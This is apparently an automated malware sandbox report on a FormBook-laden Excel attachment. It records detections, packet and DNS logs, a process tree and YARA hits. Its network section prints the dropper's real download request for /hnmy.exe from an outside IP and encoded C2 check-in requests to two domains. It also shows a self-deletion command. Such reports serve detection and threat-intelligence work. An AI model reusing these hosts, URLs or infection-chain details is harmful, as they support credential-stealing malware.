                                            SSDEEP:12288:KrsJGHL/Sw61UEVluVwMh8YelnvoCUiNG5VNQa5VQeiXMr0cZhMsr:CsJGHLbEVlu3elnwCR8xVPiXURr
                                            MD5:A21C93294EF3770C5C728A1B2D82FB92
                                            SHA1:239E6B8D02BA3501EFDC22AE5690DCE827F3AA6B
                                            SHA-256:1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
                                            SHA-512:5621C1D39B752D5320CEE7BD265AB0C26C14791215F2A3D9F34BD870DC818DEB36DD0F46B443F95919B41544FC13C671F2C50B4C6602B15642DBF4C655C54748
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 31%
                                            • Antivirus: ReversingLabs, Detection: 60%

                                            Static File Info

                                            General

                                            File type:CDFV2 Encrypted
                                            Entropy (8bit):7.976608927486528
                                            TrID:
                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                            File name:RFQ_Order_PO_TAE5203E.xlsx
                                            File size:304184
                                            MD5:552f043a7c752ec7e8dddbdf0b36c4d8
                                            SHA1:cfb4a5bea12cab9a47d3ff1ee1210d444b9a92a4
                                            SHA256:e7a5f1c37a043773027f4937afb63d3178362113132066c7435b6d716eda6cf2
                                            SHA512:2d5c9c4dc2f5a483cd572db62f5339446391cd152f86f227f0c044d620c010b9433c1f6aa59133f799bd16f433ad9bc7035062384ea00a50f72d29ba74fc8273
                                            SSDEEP:6144:VIBQ3UNUjY9p3U3jjEl4vzTJpxdaO53SXUjS2LIGI9DGv:VIB92eU3PElChxy2ZCw

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP     Dest IP
                                            01/13/22-20:10:41.317248  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  163.197.71.43
                                            01/13/22-20:10:41.317248  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  163.197.71.43
                                            01/13/22-20:10:41.317248  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  163.197.71.43

                                            Network Port Distribution

                                            TCP Packets

                                            Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                            Jan 13, 2022 20:09:01.283556938 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.454504013 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.454636097 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.454904079 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.625545979 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.625571012 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.625587940 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.625606060 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.625705957 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.625756025 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795497894 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795569897 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795583010 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795624971 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795635939 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795685053 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795700073 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795747042 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795757055 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795810938 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795826912 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795878887 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795890093 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.795937061 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.795953989 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.796000957 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966166973 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966222048 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966260910 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966300964 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966341019 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966366053 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966377974 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966404915 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966409922 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966430902 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966451883 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966475964 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966501951 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966516972 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966538906 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966559887 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966587067 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966599941 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966624975 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966639042 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966660976 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966679096 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966718912 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966731071 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966759920 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966773987 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966801882 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:01.966824055 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.966862917 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:01.971823931 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136657953 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136702061 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136724949 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136749029 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136770010 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136795044 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136821032 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136843920 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136866093 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136883974 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136888981 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136914015 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136919022 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136925936 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136929989 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136933088 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136940002 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136951923 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136966944 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136972904 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.136993885 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.136998892 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137020111 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137026072 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137044907 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137053967 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137072086 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137080908 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137099981 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137104988 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137128115 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137131929 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137152910 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137160063 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137181044 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137185097 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137208939 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137212038 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137236118 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137240887 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137263060 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137271881 CET  49167        80         192.168.2.22    209.141.37.110
                                            Jan 13, 2022 20:09:02.137290001 CET  80           49167      209.141.37.110  192.168.2.22
                                            Jan 13, 2022 20:09:02.137299061 CET  49167        80         192.168.2.22    209.141.37.110

                                            UDP Packets

                                            Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                            Jan 13, 2022 20:10:29.553617001 CET  52167        53         192.168.2.22  8.8.8.8
                                            Jan 13, 2022 20:10:29.587907076 CET  53           52167      8.8.8.8       192.168.2.22
                                            Jan 13, 2022 20:10:34.676338911 CET  50591        53         192.168.2.22  8.8.8.8
                                            Jan 13, 2022 20:10:34.719089031 CET  53           50591      8.8.8.8       192.168.2.22
                                            Jan 13, 2022 20:10:40.952409983 CET  57805        53         192.168.2.22  8.8.8.8
                                            Jan 13, 2022 20:10:41.128570080 CET  53           57805      8.8.8.8       192.168.2.22

                                            DNS Queries

                                            Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                   Type            Class
                                            Jan 13, 2022 20:10:29.553617001 CET  192.168.2.22  8.8.8.8  0xc18c    Standard query (0)  www.aloebiotics.com    A (IP address)  IN (0x0001)
                                            Jan 13, 2022 20:10:34.676338911 CET  192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.mediafyagency.com  A (IP address)  IN (0x0001)
                                            Jan 13, 2022 20:10:40.952409983 CET  192.168.2.22  8.8.8.8  0x9c63    Standard query (0)  www.sjljtzsls.com      A (IP address)  IN (0x0001)

                                            DNS Answers

                                            Timestamp                            Source IP  Dest IP       Trans ID  Reply Code      Name                   CName  Address        Type            Class
                                            Jan 13, 2022 20:10:29.587907076 CET  8.8.8.8    192.168.2.22  0xc18c    No error (0)    www.aloebiotics.com           64.190.62.111  A (IP address)  IN (0x0001)
                                            Jan 13, 2022 20:10:34.719089031 CET  8.8.8.8    192.168.2.22  0xfc43    Name error (3)  www.mediafyagency.com  none   none           A (IP address)  IN (0x0001)
                                            Jan 13, 2022 20:10:41.128570080 CET  8.8.8.8    192.168.2.22  0x9c63    No error (0)    www.sjljtzsls.com             163.197.71.43  A (IP address)  IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 209.141.37.110
                                            • www.aloebiotics.com
                                            • www.sjljtzsls.com

                                            HTTP Packets

                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                            0           192.168.2.22  49167        209.141.37.110  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Timestamp                            kBytes transferred  Direction  Data
                                            Jan 13, 2022 20:09:01.454904079 CET  0                   OUT        GET /hnmy.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 209.141.37.110
                                            Connection: Keep-Alive
                                            Jan 13, 2022 20:09:01.625545979 CET  1                   IN         HTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Tue, 11 Jan 2022 22:12:56 GMT
                                            Accept-Ranges: bytes
                                            ETag: "109cc962387d81:0"
                                            Server: Microsoft-IIS/8.5
                                            Date: Fri, 14 Jan 2022 03:08:59 GMT
                                            Content-Length: 598016
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N%F%uRichPELtFX05Z@pA5.textm `.rdatanlp@@.data```@.bss@@.bdata@


                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                            1           192.168.2.22  49169        64.190.62.111   80                C:\Windows\explorer.exe
                                            Timestamp                            kBytes transferred  Direction  Data
                                            Jan 13, 2022 20:10:29.619673967 CET  633                 OUT        GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1
                                            Host: www.aloebiotics.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2022 20:10:29.667659998 CET  634                 IN         HTTP/1.1 302 Found
                                            date: Thu, 13 Jan 2022 19:10:29 GMT
                                            content-type: text/html; charset=UTF-8
                                            content-length: 0
                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GTxiloapR1ouiWajLwmhGMgatEfBQT8Lt/O7roGfPHtYFN3fCBkotTGrIMvL9hCe/C1t0kJPaTvqQKNkZwupGQ==
                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                            pragma: no-cache
                                            last-modified: Thu, 13 Jan 2022 19:10:29 GMT
                                            location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                            x-cache-miss-from: parking-78bc4f798d-x6gjq
                                            server: NginX
                                            connection: close


                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                            2           192.168.2.22  49170        163.197.71.43   80                C:\Windows\explorer.exe
                                            Timestamp                            kBytes transferred  Direction  Data
                                            Jan 13, 2022 20:10:41.317248106 CET  635                 OUT        GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1
                                            Host: www.sjljtzsls.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2022 20:10:41.508686066 CET  636                 IN         HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Thu, 13 Jan 2022 19:10:41 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Ascii: bf<script language="javascript" type="text/javascript" src="/js.js" rel="nofollow"></script><script language="javascript"> window.location= "http://sogou.9898top1.com/sscx.html";</script>0


                                            Code Manipulations

                                            Statistics

                                            Behavior


                                            System Behavior

                                            General

                                            Start time:20:08:29
                                            Start date:13/01/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                            Imagebase:0x13fad0000
                                            File size:28253536 bytes
                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:20:08:50
                                            Start date:13/01/2022
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:20:08:54
                                            Start date:13/01/2022
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\Public\vbc.exe"
                                            Imagebase:0x400000
                                            File size:598016 bytes
                                            MD5 hash:A21C93294EF3770C5C728A1B2D82FB92
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 31%, Metadefender
                                            • Detection: 60%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:20:09:13
                                            Start date:13/01/2022
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\Public\vbc.exe
                                            Imagebase:0x400000
                                            File size:598016 bytes
                                            MD5 hash:A21C93294EF3770C5C728A1B2D82FB92
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:20:09:15
                                            Start date:13/01/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0xffa10000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:20:09:27
                                            Start date:13/01/2022
                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                            Imagebase:0xca0000
                                            File size:73216 bytes
                                            MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:20:09:31
                                            Start date:13/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                            Imagebase:0x4a4e0000
                                            File size:302592 bytes
                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis
